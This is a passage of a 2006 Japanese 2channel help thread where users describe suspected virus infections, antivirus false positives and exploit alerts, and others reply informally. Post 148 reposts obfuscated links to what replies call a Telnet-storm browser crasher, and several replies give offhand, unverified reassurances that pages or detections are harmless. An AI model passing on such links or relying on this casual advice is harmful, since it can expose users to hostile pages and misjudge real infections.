>http://canon-sol.jp/supp/nd/wndt7003.html
>プリンタとの相性で印刷不能になる問題。
>http://canon-sol.jp/supp/nd/wndt4205.html
>Windowsアップデートができなくなる問題
>http://canon-sol.jp/supp/nd/wndt4212.html



79 :名無しさん@お腹いっぱい。:2006/03/06(月) 20:33:59
原田ウィルス復活!!

80 :名無しさん@お腹いっぱい。:2006/03/07(火) 10:18:58
【使用OS】 WinXP MCE2005 sp2
【WindowsUpdateしてるか】 自動更新+MSUPDATE毎日
【AntiVirusは何を使っているか】 Avast4!Homeedition+Zonealarm
【ちゃんとUpdateしてるか】
【スキャンした結果(ウイルス名・発見場所)】 VBS.Network.E 漏れの個人ディレクトリ
【別のオンラインスキャンしたならその結果は】 Norton Onlinesecurityだっけかで実施して発覚。
【症状を具体的に、分かる限りすべて書く】 まだにも活動していないけど、まさか山田オルタネイティブ撒くためにこのウイルス撒いた?
【何をしたらそんなことになったのか】 ホットゾヌβage20でニュー速+見てたら感染。
【これまでにとった措置】 ゴミ箱→削除
【その他の質問】 これでいいの?シマンテックのサイトには危険度低ってあったけど。

81 :名無しさん@お腹いっぱい。:2006/03/07(火) 12:55:42
デスクトップのショートカット全てが
元のショートカットアイコンの上にフォルダのアイコンが重なったアイコンに
変わっていました(;x;
どうしたらいいでしょうか?

82 :名無しさん@お腹いっぱい。:2006/03/07(火) 13:21:54
ショートカットのアイコンの設定をしなおしてください

83 :名無しさん@お腹いっぱい。:2006/03/07(火) 16:12:32
>>80
ノートンが誤反応するコードが張ってあるスレを見ると感染するよ。
ただの誤反応だから問題ないと思う。

84 :名無しさん@お腹いっぱい。:2006/03/07(火) 16:31:20
XPでパスワードをかけてユーザーを分けて使ってた場合、
片方がWINNYの暴露ウイルスにかかるともう片方のファイルも暴露されるんですか?



85 :名無しさん@お腹いっぱい。:2006/03/07(火) 16:32:24
ダウソへ

86 :名無しさん@お腹いっぱい。:2006/03/07(火) 16:34:40
暴露ウイルスはユーザーパスワード関係なし?

87 :名無しさん@お腹いっぱい。:2006/03/07(火) 16:35:58
ダウソではだれも答えてくれませんでした

88 :名無しさん@お腹いっぱい。:2006/03/07(火) 16:58:12
downフォルダのファイルを今まで無かったupフォルダにrar形式で圧縮して、
UpFolder.txtには作成されたupフォルダを指す一行とtrip...の一行が追加
されたのは新種ウィルスの仕業ですかね?

89 :名無しさん@お腹いっぱい。:2006/03/08(水) 08:40:37
【使用OS】 WinXP Pro
【WindowsUpdateしてるか】 していました
【AntiVirusは何を使っているか】ノートン(お試し版)
【ちゃんとUpdateしてるか】していました
【スキャンした結果(ウイルス名・発見場所)】 ノートンではトロイ
【別のオンラインスキャンしたならその結果は】 異常なし
【症状を具体的に、分かる限りすべて書く】 インターネットにアクセス後デスクトップに新しいフォルダが作られる。最新ウイルス定義にアップデートできない
【何をしたらそんなことになったのか】 Winnyの起動に失敗したまま放置
【これまでにとった措置】 リカバリ、オンラインスキャン
【その他の質問】





90 :名無しさん@お腹いっぱい。:2006/03/08(水) 10:16:38
昨日友達が私の家でライムなんとかというやつをしていて、今日パソコンをつけてみたら電源はつくのですが、いつもみたいに起動しません…ウィルスですか…?

91 :名無しさん@お腹いっぱい。:2006/03/08(水) 10:27:54
友達にはめられたね(b^-゜)

92 :名無しさん@お腹いっぱい。:2006/03/08(水) 11:01:45
>>1
>Winny関連のウィルスは、Download板に専門スレッドがあります。

93 :名無しさん@お腹いっぱい。:2006/03/08(水) 11:15:26
それってLimeChatじゃね?と適当に言ってみる。

94 :名無しさん@お腹いっぱい。:2006/03/08(水) 18:14:32
LimeWireか?

95 :長兄:2006/03/09(木) 21:57:56
>>90
次男大丈夫か?


96 :名無しさん@お腹いっぱい。:2006/03/10(金) 10:04:24
【その他の質問】
宝物幻想にあるmedisって検出力どんなものなんだ?
tp://www.antiwmac.com/public/day/
まあそもそもの検出について疑っているんだが。
あの速度からしてやっているならメモリ検査だろうし。

97 :名無しさん@お腹いっぱい。:2006/03/10(金) 22:32:17
小泉ウイルス?
http://tmp6.2ch.net/test/read.cgi/download/1141942961/


98 :名無しさん@お腹いっぱい。:2006/03/10(金) 23:30:17
('A`)

99 :名無しさん@お腹いっぱい。:2006/03/11(土) 21:31:23
【使用OS】 WindowsXP
【WindowsUpdateしてるか】 してる
【AntiVirusは何を使っているか】 McAfee
【ちゃんとUpdateしてるか】 してる
【スキャンした結果(ウイルス名・発見場所)】 W95/CTX 
場所忘れました。どうやったら調べられますか?
【別のオンラインスキャンしたならその結果は】 してない
【症状を具体的に、分かる限りすべて書く】  今のところなし。
【何をしたらそんなことになったのか】 わからない。
【これまでにとった措置】 隔離できるものは隔離。1つ隔離できず。
【その他の質問】 駆除しようとしてもできません。
McAfeeのホームページにも駆除方法載ってません。
どうしたらいいでしょうか?今は問題なく動くけど、
これから何が起こるかわからないから怖いです…


100 :名無しさん@お腹いっぱい。:2006/03/11(土) 21:45:25
>>99
776 名前:768[] 投稿日:2006/03/11(土) 15:19:10
先程マカフィから返事が届いたのでアップしておきます。

>今回お問い合わせいただきました件に関しましては、手動スキャンを実行すると
W95/CTXというファイルをウィルスとして認識してしまう症例がDAT4715にて報告
されております。
こちらは、修正DAT4716にて修正されておりますので、4715以下の場合は更新して
いただきますよう宜しくお願いいたします。

以上です。
私のマカフィは誤動作をしていたようで、今一度スキャンをしたら今度はウイルスは見つからないと表示されました。
誤ってすぐに処置(該当ファイルの削除など)をしなくて良かったです。
皆さんもお気をつけください。



だってさ。

101 :名無しさん@お腹いっぱい。:2006/03/11(土) 22:05:54
>>99 セーフモードで再スキャン

102 :名無しさん@お腹いっぱい。:2006/03/11(土) 22:09:24
>>100>>101
ありがとうございます!!!必死で削除しようとしてたので早く分かってよかったです。
念のためもう1回スキャンしてみます。

103 :192.168.0.103:2006/03/11(土) 23:29:52
ュ^カッノエ爽「セ ェナヌUュyクSC。@ヌeヌGニ遑罍H

104 :名無しさん@お腹いっぱい。:2006/03/12(日) 00:28:39
【使用OS】WIN XP SP2
【WindowsUpdateしてるか】はい
【AntiVirusは何を使っているか】NAV2006
【ちゃんとUpdateしてるか】はい
【スキャンした結果(ウイルス名・発見場所)】NAV2006でスキャンの結果、検出なし
【別のオンラインスキャンしたならその結果は】ウイルスバスターのスキャンの結果、検出なし
【症状を具体的に、分かる限りすべて書く】WINDOWSフォルダがゴミ箱にあった
【何をしたらそんなことになったのか】不明
【これまでにとった措置】発見してから再度スキャン、ウイルスバスターのオンライン
             スキャンをして最終的にノートンWIN Doctorで問題を自動
             解決で処理
【その他の質問】なし


105 :名無しさん@お腹いっぱい。:2006/03/12(日) 04:11:24
どの辺りがウイルスの仕業だと?w

106 :名無しさん@お腹いっぱい。:2006/03/12(日) 13:10:25
>>105

          \ ,-/      _/  ,,‐''-''ヽ ,,-‐'''‐-、  /ノ   /  ノ  /  /,,-─/
          / /      '" /    / ,,-、 /、ヽ\  ゙i;,-''"   / ./  /─''''" ̄ ,,/
         /  ./ /   ,,,-‐'"-/   / ./ ゙" "\  ゙i;,  | 、// /   "    ,,,/
       / ,-''/ /    ,,-''"_ /   //       ヽ  l /  レ'/~       /‐/
      / /  | l|  ,,-'"/゙/,」|    /    ..::;;;,,,  }  /   |~ ,,-‐,,,-'''  //~
     / /-'''''| | /l /‐'''/'' .人   i'    .:: :;'" / / l  ノ゙i// ,,-‐'"──==
     //'"   ゙i;: | /‐' ./,, ,,ノ ゙i;,.  |     _,,-ヾ.// ノ ,-''" l |  ‐'"   ,,,-‐二
     レ'     ヽl:i' ./  )'、‐,\゙i;: | ,,,-‐二-┬ナ" /‐'"‐ 〉 ,i'───'''" ̄~-''"
         ,-‐',ヽ|'"  ./゙ヽ-ゝ='\゙i,'''ヽ -゙=‐'   '" ,‐'ノ,, /‐''" ,,-‐'''"~
        / / ;;:.  ──ヽ, ゙i;'''''' , ゙ "-‐'''''"""    〔_,/ ゙ヽ'-'"~   >>104
       / /   / ,; ,,_}_  ゙、 ./__,,  _,,       /      \
      ,;'  / ,;;;:;:/;: ,,   ~ ヽ ヽ.  ヽニ‐'、     / /       ゙i,_    このへんじゃねぇか?
    ./        ''  ,l,,,,,,/ 〉  ゙ヽ、 '''' :;l  ,,-''" /        ゙i.\
    /          / ヽ /     ゙ヽ、--イ~;;:'" //   ::;:;:;:   | \
   i          /  ̄ ゙̄"          |;:" //            ヽ-‐'''"~l|
  ./    ゙''''ヽ、,,-‐''"              .i /,;'"   _,,,,,,,,,_,,,-‐'''-''"~     |
 (" ̄"'''''‐--、,,_i'                 // '",,-─'''"  ,,,-‐'",-‐'"  ,,,,-‐ .___|
 i' ゙'':::::::::::::::::::::::}                _/''-'''"~   ,,,-‐'",,-'''"  ,,,-‐二-‐''''"   ゙ヽ


107 :名無しさん@お腹いっぱい。:2006/03/13(月) 19:32:43
助けて。

【使用OS】 winXP
【WindowsUpdateしてるか】 してない
【AntiVirusは何を使っているか】 アンチウイルス
【ちゃんとUpdateしてるか】 してない
【スキャンした結果(ウイルス名・発見場所)】 検出されない
【別のオンラインスキャンしたならその結果は】 検出されない
【症状を具体的に、分かる限りすべて書く】 受信したメールが勝手に相手に
                     返信されてしまう。
【何をしたらそんなことになったのか】 不明
【これまでにとった措置】 どうしていいかわからない
【その他の質問】 強力な検出、駆除が出来るソフトを教えて欲しいです・・
       


108 :名無しさん@お腹いっぱい。:2006/03/13(月) 20:28:09
【AntiVirusは何を使っているか】 アンチウイルス

具体的に書けよw

109 :名無しさん@お腹いっぱい。:2006/03/13(月) 20:35:59
>>107
  / ̄ ̄ ̄ /  /''7 ./''7        / ̄/  /''7
 ./ ./ ̄/ /  /__/ / /  ____    ̄  / /
 'ー' _/ /   ___ノ /  /____/   ___ノ /
   /___ノ   /____,./         /____,./

   _ノ ̄/ / ̄/  /''7 / ̄ ̄ ̄/   / ̄/             /'''7'''7
/ ̄  /    ̄  / /    ̄ フ ./   /  ゙ー-;   ____   / / /._
 ̄/ /     ___ノ /   __/  (___  /  /ー--'゙ /____/ _ノ /i  i/ ./
 /__/   /____,./   /___,.ノゝ_/ /_/           /__,/ ゝ、__/

110 :名無しさん@お腹いっぱい。:2006/03/13(月) 21:26:17
>>107
エアラタw

111 :名無しさん@お腹いっぱい。:2006/03/13(月) 21:54:20
>>104
それVIPで見た

112 :名無しさん@お腹いっぱい。:2006/03/13(月) 21:59:20


                 ,r=''""゙゙゙li,
      _,、r=====、、,,_ ,r!'  ......::;il!
     ,r!'゙゙从人´    `'ヾ;、, ..::::;r!'
    ,i{゙, , ,∧__∧'_,,_ ・;∵ :l}..::;r!゙
.  ,r!'゙´ (:>>107 )・;∵、;;;:....:;l!:;r゙ ..┏┓┏┳┓
 ,rジ  ⊂ノ::::: つ  `~''=;;:;il!::'li ┏┛┗┻╋┛
. il .... ⊂○::. ノ    .:;ll:::: ゙li .┗┓┏┓┃
..il'   ' ' '‐‐ し'=;;;;;;;:.... .;;il!::  ,il!...::..:┃┃┃┃ ┏┳┳┓
..ll    YWW   `"゙'' l{::: ,,;r'゙  ..┗┛┗┛ ┗╋┛┃
..'l!       . . . . . . ::l}::;rll(,.......       .......::;;┗━┛
 'i,  ' ' -=====‐ー《:::il::゙ヾ;、
  ゙i、            ::li:il:: ゙'゙'\ ∧_∧ 「開封確認」メッセ!!
  ゙li、      ..........,,ノ;i!:...::,.ヾ(`(・∀・ )    
   `'=、:::::;;、:、===''ジ゙'==-、、゙\   と)
     `~''''===''"゙´        \/ /つ      
                     (__/ 


113 :名無しさん@お腹いっぱい。:2006/03/13(月) 22:01:24
>>107
強力な検出駆除といえばやっぱあれだろ

最近PCが重い!

├ 1.PCを買い換える
│                              
│    [まちがい]                         
│      確実な方法ではありますが、お金がかかるのが難点です。
│      それよりも別の手段を探してみませんか?
│      ちょっとしたフリーウェアでなんとかなるかも?
│              ↑
│          ココがポイント!

└ 2.RegSeekerを使う

      [せいかい]

Regseeker
ttp://www.hoverdesk.net/freeware.htm
RegSeeker1.3Beta日本語ファイル
ttp://downloads.at.infoseek.co.jp/

114 :名無しさん@お腹いっぱい。:2006/03/13(月) 23:06:20
>>113
( ゚Д゚)ゴルァ!!
変なモン勧めるな!!!

【漢専用】Regseeker 真・五代目【ばっさり上等】
http://pc8.2ch.net/test/read.cgi/win/1134390923/

【廃人専用】Regseeker 六代目【素人厳禁】
http://pc8.2ch.net/test/read.cgi/win/1134385542/

【漢専用】Regseeker 六代目【ばっさり上等】
http://pc8.2ch.net/test/read.cgi/win/1140605061/


115 :名無しさん@お腹いっぱい。:2006/03/14(火) 00:14:50
携帯からですみません。

WinXP Home、ウイルスバスター2005です。
電源を入れたら突然発症しました。
IE等を立ち上げ様とすると、「ショートカットを削除しますか?画面で元に戻せます」
と言った様なメッセージが出て、強制削除になります
(キャンセルできない)
メーラーを立ち上げるとメールが削除されます。
とにかく片っ端から削除されるので、何もできません。
PCを初期化したのですが、感染原因がわからないので
怖くてネットできません。
ウィニーの類は全くしてません。
怪しいエロとかサイトは行ってません。
ファイルの実行は市販の物しかしません。
ダウンロードも大手メーカーのしかしません。
メーラーはアウトルックですが、プレビューせずに
タイトルだけ表示にしています。
感染原因には何が考えられますか?
反省と対策をしたいので、アドバイスお願いします。

116 :名無しさん@お腹いっぱい。:2006/03/14(火) 02:08:17
セーフモードで起動してみた?

117 :名無しさん@お腹いっぱい。:2006/03/14(火) 02:10:35
って再インスコしてるのか、読み飛ばしてスマン

118 :名無しさん@お腹いっぱい。:2006/03/14(火) 02:14:27
>>115
  電源入れた 突然発症  強制削除 初期化 感染原因  怖くてネットできません! 
                                           ハ_ハ
                                    ハ_ハ   (^( ゚∀゚)^)
                               ハ_ハ  ( ゚∀゚)   ) ,, /"
                           ハ_ハ  ( ゚Д゚) ⊂  |っ  (_ノ_ノ
            ハ_ハ      ハ_ハ    ( ゚д゚) ( UU  |  |
  ⊂⌒( 。Д。)⊂^っ ・д・)っ⊂⌒( ・д・)⊂⌒UノU  O,,ノ⊃ し^J

PCを初期化(どうやって?)、WindowsUpDateは?、バスターUpDateは?、FWは?

119 :名無しさん@お腹いっぱい。:2006/03/14(火) 14:56:37
そもそも何故みんなそんなにほいほいウイルスに感染するかわからないけど、
エロサイトとやらにはそんなにウイルスが蔓延しているのですか?
NortonAntiVirus04+Kerio(ファイアウォール)+PeerGuardian2(ファイアウォール?)
+HitmanPro2(スパム駆除)+サンダーバード+Sleipnir(IEエンジンで)+2chブラウザ
っていう装備は結構安心できるほど重装備でしょうか?

120 :名無しさん@お腹いっぱい。:2006/03/14(火) 16:11:18
>>119
| 何について調べますか?
| ┌────────────┐
| | ウィルスをクリック      |
| |    しても感染しない方法 |
| └────────────┘
| [ オプション(O) ]   [ 検索(S) ]
|
`──────────┐ ┌───
           , '´l,  ..| ./
       , -─-'- 、i_  |/
    __, '´       ヽ、
   ',ー-- ●       ヽ、
    `"'ゝ、_          ',
      〈`'ー;==ヽ、〈ー- 、 !
       `ー´    ヽi`ヽ iノ
                ! /
              r'´、ヽ
              `´ヽノ

           , '´l,
       , -─-'- 、i_
      , '´○ _ ○  ヽ、
      i    /  |     ヽ、<自爆させてたら無理!
       ゝ ├-┤       ',
      〈`'ー;==ヽ、〈ー- 、 !
       `ー´    ヽi`ヽ iノ
                ! /
              r'´、ヽ
              `´ヽノ


121 :名無しさん@お腹いっぱい。:2006/03/14(火) 19:17:26
>>119
重装備っていうか中途半端

122 :名無しさん@お腹いっぱい。:2006/03/15(水) 14:06:26
フリーウエアーのDoctor Alex Antispyware を使っててパソコンおかしくなった
んだけど。。。

123 :名無しさん@お腹いっぱい。:2006/03/15(水) 17:28:00
パソコンを起動し、IEを起動させたところ、スタートが勝手に表示され
直後にボリュームが勝手に上昇し、「ファイル名を指定して実行」が開き、名前欄に9^/が表示されたり、連続して/が打ち込まれ続けるという症状がでました。
回線を切ったにも拘らず、↑の状態が続きました。スキャンしたのですが、ウィルスは検出されませんでした。スパイボットにも引っ掛かりませんでした。
現在は落ち着いていますが、困ったことにキーボードの1,9,0,R,Y,Iが反応しなくなってしまいました。
俺のパソに何が起きているんでしょう?
windows XP
ノートン




124 :名無しさん@お腹いっぱい。:2006/03/15(水) 17:50:18
>>123
単純に考えて、キーボードの故障か接触不良では?
メーカーか買ったところに相談するのがよいと思うよ。
それともIE以外では問題ないのかな?

125 :123:2006/03/15(水) 18:40:28
>>124
アドバイスありがとうございます。
物置に放置していたキーボードを引っ張り出して接続したら普通に書き込めました。
ご指摘の通りだと思います。
本当に御迷惑おかけしました。



126 :名無しさん@お腹いっぱい。:2006/03/15(水) 21:44:45
【使用OS】 WindowsXP
【WindowsUpdateしてるか】 してる
【AntiVirusは何を使っているか】 ノートン
【ちゃんとUpdateしてるか】最近した
【スキャンした結果(ウイルス名・発見場所)】ノートンでは検出されませんでした。 
【別のオンラインスキャンしたならその結果は】http://www3.ca.com/securityadvisor/virusinfo/scan.aspxここのサイトでJava.Shinwow FamilyとJava.ByteVerify!exploitっていうのが検出されました。
【症状を具体的に、分かる限りすべて書く】すこし重いような感じがします。関係ないかも知れないですが、音がでなくなりました。
【これまでにとった措置】 調べたのですが、どうすればいいかわかりません。
【その他の質問】 お願いします助けてください



127 :名無しさん@お腹いっぱい。:2006/03/15(水) 21:49:52
>>126
ここeTrustのオンラインスキャンだろww
ウイルスじゃない。IEで開け

128 :名無しさん@お腹いっぱい。:2006/03/15(水) 21:51:42
>>127
すいませんここのサイトでスキャンしたら検出されました。言葉がたりませんでした

129 :127:2006/03/15(水) 21:51:46
うわ、勘違いしてた
ゴメン

130 :126:2006/03/15(水) 22:02:15
アップデートしてるなら検出はされるけど被害は無いよ
Javaのキャッシュを削除すれば良い

131 :名無しさん@お腹いっぱい。:2006/03/15(水) 22:15:47
>>130
ありがとうございました

132 :名無しさん@お腹いっぱい。:2006/03/15(水) 22:16:37
事故解決しました

133 :名無しさん@お腹いっぱい。:2006/03/16(木) 01:32:36
2ちゃんロムっているときに、いきなりoutlookが立ち上がってとまらなくなりました。
強制終了して再起動したら通常通りに使えました。
こういう状態になった方いらっしゃいますか?

134 :名無しさん@お腹いっぱい。:2006/03/16(木) 02:12:12
>>133
うちは急にwinampがなり始めるけど自分の操作ミスだと想ってる。
そうじゃないの?

135 :名無しさん@お腹いっぱい。:2006/03/16(木) 02:27:51
>>133
前も2ちゃんみてるだけとか言ってたくせに話聞くと貼られたアドレス踏みました
って言ってる奴がいたんけど、何かクリックしてない?

その症状だとメールtoストームっぽいけど

136 :名無しさん@お腹いっぱい。:2006/03/16(木) 20:55:05
>134、135
どうやら、メールストームだったみたいです。
今は異常ないみたいです。ありがとうございました。


137 :名無しさん@お腹いっぱい。:2006/03/16(木) 21:12:09
やっぱ踏んでんのかよww

138 :名無しさん@お腹いっぱい。:2006/03/16(木) 22:35:31
最近約1時間ごとにネットが切断され、
ネットワーク接続を無効にし、再度有効にすると治るという
現象が起きています。
このようなウイルスは存在するのでしょうか?

139 :名無しさん@お腹いっぱい。:2006/03/16(木) 23:58:34
>>138
無線LAN使ってて同じ症状が出たことがあるけどどんな環境?

140 :名無しさん@お腹いっぱい。:2006/03/17(金) 00:41:36
JCOMのADSLです。XPです。
ルーターなどは使用していません。

141 :名無しさん@お腹いっぱい。:2006/03/17(金) 00:46:28
ただ回線が不安定になってるだけじゃなくて?
今もずっとそう?

142 :名無しさん@お腹いっぱい。:2006/03/17(金) 00:52:51
今は結構持ってます。時間くらいかな。
やっぱ回線の問題かな、最近導入したばっかなので。
ウイルスじゃないみただったら様子見てサービスセンターに
電話しようと思います。
お答えいただきありがとうございました。

143 :名無しさん@お腹いっぱい。:2006/03/17(金) 02:26:38
どこで聞けばいいかわからないからここで。

携帯なのですが、何か色々おかしいんです・・・。
変なページを踏んでフリーズ?したかと思ったら勝手にメール送信画面になったんです。
それでびびって電源落とそうとしたけど何押してもきかなくて。
慌てて電池パック抜いて強制的に電源OFF。
で、再起動はちゃんと成功して、良かったなんともない。と安心したんですけど・・・
お気に入り登録出来なくなってるし画像のDLも出来なくなってるし、
戻るを押す度「表示するコンテンツがありません 再取得しますか?」とかいう表示が出てUZEEEEE!!!!!

もはや何がなんだか分からない状態です。
色々試しましたが直りませんでした。
これってやっぱりウイルスでしょうか?
誰か助けてくださいorz

乱文スマソ

144 :名無しさん@お腹いっぱい。:2006/03/17(金) 08:30:36
単に携帯壊れただけじゃね?

145 :名無しさん@お腹いっぱい。:2006/03/17(金) 15:24:24
>>143 どこで聞けばいいかわからないからここで。

普通、携帯のメーカーか電話会社でしょww

146 :名無しさん@お腹いっぱい。:2006/03/17(金) 22:23:06
age

147 :名無しさん@お腹いっぱい。:2006/03/18(土) 00:15:21
Win2000でupdateちゃんとしてます。
NortonAntiVirus2005でupdateちゃんとしてます。

んで、昨日くらいから5分に一回くらいの間隔で
頻繁に「不正な侵入をノートンがブロックしました」みたいなのが表示されます。。

名前は、「MS ASN1 Interger Overflow TCP」
これってなんなのでしょうか???
もしかして狙い撃ちされてる?


148 :名無しさん@お腹いっぱい。:2006/03/18(土) 01:04:58
ウイルス注意!
tp://www.trasher.ru/foto/trasher/trasher.jpg
tp://mnc.rokcorp.net/ib/ghost/src/1139635922362.jpg

このウイルスってどんなウイルスですか?間違えて、対策なしで開いちゃったんだけど・・・
よろしくお願いします


149 :名無しさん@お腹いっぱい。:2006/03/18(土) 01:46:22
いますぐトライアル版を落としてスキャン汁
話はそれからだ。

150 :名無しさん@お腹いっぱい。:2006/03/18(土) 01:56:49
私はノートンですけど、上記のウィルスを踏んでしまいました。
ノートンは高危険度の表示をしました。

151 :名無しさん@お腹いっぱい。:2006/03/18(土) 01:57:27
>>148
Telnetストーム。ただのブラクラ
ただのグロ漫画

PC無害

152 :151:2006/03/18(土) 01:59:54
無害dehaないかw
rundll32.exeとtelnet.exeを終了させれ問題無し
多分脳トンが止めてくれてるよ

153 :名無しさん@お腹いっぱい。:2006/03/18(土) 02:08:38
関連:

【ネット】「山田オルタナティブ」拡大 パソコン中身がネット流出[03/17]
http://news19.2ch.net/test/read.cgi/newsplus/1142606486/

【ネット】"パソコンの中身をすべて公開" ウィニー利用者以外も情報流出…新ウイルス「山田オルタナティブ」
http://news19.2ch.net/test/read.cgi/newsplus/1142589519/

154 :名無しさん@お腹いっぱい。:2006/03/18(土) 02:09:35
板違い

155 :名無しさん@お腹いっぱい。:2006/03/18(土) 03:14:58
>>152

ノートンはいってない俺の場合はどうなるの?

156 :名無しさん@お腹いっぱい。:2006/03/18(土) 03:33:46
>>155
もしくらってたらtelnet.exeが動いてて プロセスにRundll32.exeがあるから
それを切ればいいだけ。それで問題なし
ブラウザによっては開けないしそれほど危険でもない

157 :名無しさん@お腹いっぱい。:2006/03/18(土) 06:20:25
7月1日から
「ウイルス」「virus」は「バイロス」「bairos」「G@DC」に変わります

158 :名無しさん@お腹いっぱい。:2006/03/18(土) 06:23:08
問い合わせ先
04-8154-8154 04-8154-0110

159 :157 さいたま局:2006/03/18(土) 06:25:25
>04-8154-8154 >04-8154-0110

160 :名無しさん@お腹いっぱい。:2006/03/18(土) 07:14:25
英語発音は「バイラス」なのにいつから「ウィルス」なんてのが一般的になっちまったんだろう?

161 :名無しさん@お腹いっぱい。:2006/03/18(土) 07:17:46
>>147
俺もノートン2005なんだけど、
同じ日位から、同じ警告が出てるよ。
原因はわかんないけど、なんだろ?
俺も心配…
ノートンすれでちょいと聞いてくるね。

162 :名無しさん@お腹いっぱい。:2006/03/18(土) 15:29:55
>>161
当方ノートン2006で一昨日ぐらいからその状況です。
何故か侵入者のIPが自分のプロバイダ関連がほとんどです。
そちらはどうですか?

163 :名無しさん@お腹いっぱい。:2006/03/18(土) 15:33:32
ずっと前は、ヴィールスって言い方もあった(人に感染するほうだけど)

164 :名無しさん@お腹いっぱい。:2006/03/18(土) 16:01:12
【使用OS】 XP PROFESSIONAL SP2
【WindowsUpdateしてるか】 yes
【AntiVirusは何を使っているか】NOD32
【ちゃんとUpdateしてるか】 YES
【スキャンした結果(ウイルス名・発見場所)】pestpatrolでスキャン
BraveSentry・Key: hkey_classes_root \.key
【別のオンラインスキャンしたならその結果は】
eTrustR PestScan オンラインスキャン なし
doctor alex なし
【症状を具体的に、分かる限りすべて書く】
【何をしたらそんなことになったのか】
【これまでにとった措置】
【その他の質問】
pestpatrol2005でスキャンしたら出てきたのですが
ググッたらどうやらセキュリティソフトの名前らしいのですが
BraveSentryなどインストールしてもいませんが、なぜかPC内でペストとしてありました。
これは削除したほうがいいのでしょうか?



165 :名無しさん@お腹いっぱい。:2006/03/18(土) 16:44:23
blogにやたらコメントがあり、クリックしたところ、
googleに飛ばされました。何かパソコンに入れられたんでしょうか??
大丈夫でしょうか。

URLはこれでした。
ttp://online-slot.free.bg/

166 :147:2006/03/18(土) 17:58:44
>>161
そうそう。相手は同じプロバイダです。
時々IPアドレス変わってくるのだが、
調べてみると同じプロバイダのIPアドレスから。

うちではUSEN使ってます。
なんだろうか。

167 :名無しさん@お腹いっぱい。:2006/03/18(土) 20:59:11
>>166
うちもUSENです!
USENになにか問題があるのでしょうか…?

168 :名無しさん@お腹いっぱい。:2006/03/18(土) 21:05:25
161と147と同じ警告がでる
これはなんですか?
侵入者が全く一緒

169 :161:2006/03/18(土) 22:40:25
>>166
ん?俺もUSENで、光タイプVなんだけど…
原因はUSEN?

ノートンスレでは、原因わからなかったんで、今度はusenすれでもいってくるか…

170 :名無しさん@お腹いっぱい。:2006/03/18(土) 23:00:49
他板で少し教わってきた。
「MS ASN1 Interger Overflow TCP」
http://www.st.ryukoku.ac.jp/%7Ekjm/security/memo/2004/02.html#20040212_MS04-007
http://secunia.com/advisories/10759
対策はパッチを適用すること。Windows Updateを実施すれば適用できる。
セキュリティ情報のページからもダウンロードできる。
今回のセキュリティ・ホールについては,パッチを適用すること以外の回避策は存在しない。
セキュリティ情報の「回避策」の項には,ただ一言「なし」と記述されている。
設定変更やパーソナル・ファイアウオールなどで回避することはできない。
ASN1ライブラリの脆弱性を突くエクスプロイト。
パッチを当てれば安全だが攻撃受ければアラートがあがる

だそうです

171 :名無しさん@お腹いっぱい。:2006/03/18(土) 23:10:39
http://dentu-tarou.hp.infoseek.co.jp/index-101.html


172 :名無しさん@お腹いっぱい。:2006/03/19(日) 05:00:46
このウイルスってどんなウイルスですか?間違えて、対策なしで開いちゃったんだけど・・・
よろしくお願いします
http://nocharge.harisen.jp/3131/regist.htm
http://tyoukyou.nomaki.jp/sssm/sm_play.htm
http://pr.mail.yahoo.co.jp/wintergames/


173 :名無しさん@お腹いっぱい。:2006/03/19(日) 05:04:31
全部ウイルスじゃない
PC無害

174 :名無しさん@お腹いっぱい。:2006/03/19(日) 05:07:55
172です
ありがとうございました!

175 :名無しさん@お腹いっぱい。:2006/03/19(日) 05:12:44
>>173
ウイルスバスター2006使ってるんですが検索でスパイウェア削除できないのあるんですが?
最新のアップデートしてからじゃないと削除できないんですか?

176 :名無しさん@お腹いっぱい。:2006/03/19(日) 05:14:35
多分、追跡クッキーでしょ
スパイウェアというより

177 :名無しさん@お腹いっぱい。:2006/03/19(日) 05:17:57
ウイルスバスターじゃなくてスパイウェア駆除ソフト使った方がいいよ
http://pc8.2ch.net/test/read.cgi/sec/1142697203/2-13

ここに除去ソフトのレビューみたいなものがあるから参考に

178 :名無しさん@お腹いっぱい。:2006/03/19(日) 05:44:59
172 174です。
>>173 さんはウイルス予防駆除ソフトは何を使われていますか?

179 :名無しさん@お腹いっぱい。:2006/03/19(日) 05:52:27
>>178
173じゃないけどNIS2005+WindowsDefender装備で見たがまったく無害。
なんでウイルスって判断したの?

180 :173:2006/03/19(日) 05:52:54
>>178
avast!だけど>>172は本当に無害だよ
1つ目、2つ目は携帯向けサイトだし3つ目はYahoo!の中のページ
信用してくれよw


181 :名無しさん@お腹いっぱい。:2006/03/19(日) 05:58:17
>>179
はい、最近下のサイトからよくメールが送られてくるようになったのです。

TSUKAME EIKOU! KAGAYAKE EGAO!
Yahoo! JAPAN JPC OFFICIAL PARTNER INTERNET PORTAL SITE
http://pr.mail.yahoo.co.jp/wintergames/

ありがとうございました。

182 :名無しさん@お腹いっぱい。:2006/03/19(日) 05:59:38
>>180
wwそうみたいですね。ありがとう!!

183 :名無しさん@お腹いっぱい。:2006/03/19(日) 06:04:02
>>178
結局178のプロバイダがソフトバンクって事でおk?

184 :名無しさん@お腹いっぱい。:2006/03/19(日) 06:07:59
だな

185 :175:2006/03/19(日) 06:20:05
>>177
すいません。勘違いしてた削除できます、危険性はあまり無いみたいなんですが一応削除した方がいいんでしょうか?

186 :名無しさん@お腹いっぱい。:2006/03/19(日) 06:24:32
とりあえず消しときなよ

187 :175:2006/03/19(日) 06:30:41
>>186
とりあえず消しときました。

188 :名無しさん@お腹いっぱい。:2006/03/19(日) 07:01:33
クッキーなんて削除しても大きい問題はない

189 :名無しさん@お腹いっぱい。:2006/03/19(日) 08:50:45
フォルダを削除しようとすると
「アクセスできません。アクセスが拒否されました。」とでて削除できません。
入れてるnorton2006でのウィルススキャンとトレンドマイクロのオンラインスキャンをやってみましたが特に反応なしです。
これはトロイの木馬とかでしょうか?どうにか再インストールせずに問題解決できませんか?

190 :名無しさん@お腹いっぱい。:2006/03/19(日) 08:53:20
話題のウイニーのウイルスは、アドウエアーで駆除できるの?


191 :189:2006/03/19(日) 10:57:35
OSはXPHomeです
セーフモードでadministratorでログインして削除しようとしましたが
アクセスが拒否となります

192 :名無しさん@お腹いっぱい。:2006/03/19(日) 12:42:14
>>191
何のフォルダか書いてくれないと。xeroxだったりする?

193 :名無しさん@お腹いっぱい。:2006/03/19(日) 13:05:22
System Volume Informationの予感・・・・

194 :名無しさん@お腹いっぱい。:2006/03/19(日) 15:21:22
W32:VB-IIについてご存知の方はいらっしゃいますか?
